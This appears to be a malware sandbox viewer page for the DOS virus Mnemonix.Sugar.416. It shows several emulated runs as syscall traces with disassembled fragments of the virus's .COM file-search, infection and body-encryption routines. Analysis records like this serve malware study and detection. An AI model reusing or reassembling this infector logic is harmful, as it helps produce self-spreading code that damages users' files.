Sample viewer

vx.netlux.org/Virus.DOS.Mnemonix.Sugar.416

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:55.688473939Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-17T22:19:55.69054162Z 78 PC: 12a9b | Find first file
2018-12-17T22:19:55.694357266Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:55.698481947Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.702852329Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.703836907Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.705443022Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.706481884Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.70838753Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-17T22:19:55.71018957Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.723684632Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.725539221Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.733385552Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.735988409Z 61 PC: 12aca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:19:55.742814221Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.749229452Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.750667506Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.754152739Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.755766031Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.758447159Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-17T22:19:55.761297035Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.763964403Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.765510179Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.773658006Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.776670573Z 61 PC: 12aca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:19:55.783615018Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.79148444Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.793603957Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.796672828Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.798813322Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.801541651Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-17T22:19:55.803595195Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.806975206Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.808454127Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.815954347Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.818498948Z 61 PC: 12aca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:19:55.825155714Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.831540409Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.833075331Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.836418225Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.837839512Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.840340505Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-17T22:19:55.843200235Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.845657103Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.847237453Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.857515913Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.860091947Z 61 PC: 12aca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:19:55.866493265Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.873041072Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.875504373Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.878451572Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.881030434Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.88401088Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-17T22:19:55.886495541Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.890069267Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.891817643Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.899212367Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.902624523Z 61 PC: 12aca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:19:55.909243719Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.914798442Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.916566321Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.918420749Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.919507926Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.921907758Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-17T22:19:55.923782378Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.928873818Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.930800952Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.935792597Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.937578867Z 61 PC: 12aca | Open file (Filename = 'PAH.COM')
2018-12-17T22:19:55.94224163Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.946807559Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:19:55.947853051Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.950896075Z 66 PC: 12b22 | Move file pointer
2018-12-17T22:19:55.952340002Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:55.954996113Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-17T22:19:55.957497939Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-17T22:19:55.960660388Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.962009153Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.966894062Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.971099602Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:19:55.975224267Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:55.977269261Z 87 PC: 12b83 | Get or set file date and time
2018-12-17T22:19:55.979013921Z 62 PC: 12b87 | Close file
2018-12-17T22:19:55.983771794Z 79 PC: 12aaa | Find next file
2018-12-17T22:19:55.986832829Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-17T22:19:55.989892054Z 76 PC: 12a44 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:13.733499363Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T11:49:13.739732093Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.749884422Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.759246127Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.767501695Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.77353088Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.776416966Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.777892513Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.782601735Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T11:49:13.785193693Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:13.801694564Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:13.812642826Z 62 PC: 12b87 | Close file
2018-12-25T11:49:13.822239666Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:13.825107207Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.833021307Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.841258292Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.842802672Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.84720832Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.848736606Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:13.851640185Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:13.85464351Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:13.857588694Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:13.859453802Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:13.869629355Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:13.873450458Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.88270206Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.89103427Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.893742782Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.896954952Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.898538849Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:13.902103598Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:13.904882357Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:13.908773226Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:13.912015001Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:13.926246931Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:13.929484482Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.937326209Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.94501691Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.946784531Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.949952831Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.951669855Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:13.954971975Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:13.95724423Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:13.960236652Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:13.961883528Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:13.969642198Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:13.973110884Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:13.980698295Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:13.988012133Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:13.990769121Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:13.994464731Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:13.996593622Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.000699542Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.003722102Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.006906431Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.009200514Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.018759306Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.022157821Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.030031842Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.038949262Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.041195162Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.045472165Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.048243997Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.051997706Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.055697599Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.066779627Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.068649186Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.075717907Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.079908572Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.088503189Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.095888388Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.098099473Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.101323365Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.10276897Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.105832059Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.10905465Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.112207843Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.113944032Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.122435964Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.125727921Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.133377144Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.137881008Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.139862946Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.147710834Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.151245074Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.154462554Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:13.799754249Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T11:49:13.803061266Z 59 PC: 12a8d | Change current directory
2018-12-25T11:49:13.80768092Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.813799374Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.825889034Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.832854655Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.834534596Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.837400561Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.840262302Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.843159106Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T11:49:13.845637903Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.279115706Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.280987603Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.288709367Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.292788878Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.29999381Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.306594894Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.309005732Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.311618514Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.312980945Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.316597399Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.31910914Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.322756524Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.325391694Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.332922199Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.335531655Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.343692905Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.351275298Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.352983258Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.35677496Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.365238655Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.368185728Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.370889674Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.375864057Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.377641872Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.385352819Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.388789972Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.396841985Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.40383098Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.409077457Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.41200971Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.413693853Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.41988873Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.422026716Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.424572387Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.427487427Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.43470846Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.437500361Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.446983923Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.453821844Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.455187745Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.458770806Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.460163686Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.462711288Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.465493218Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.468382836Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.469841476Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.479248533Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.481866965Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.486787524Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.494366435Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.49605001Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.49882385Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.500854412Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.503715454Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.50586796Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.514924188Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.517061338Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.52480861Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.527619645Z 61 PC: 12aca | Open file (See above)
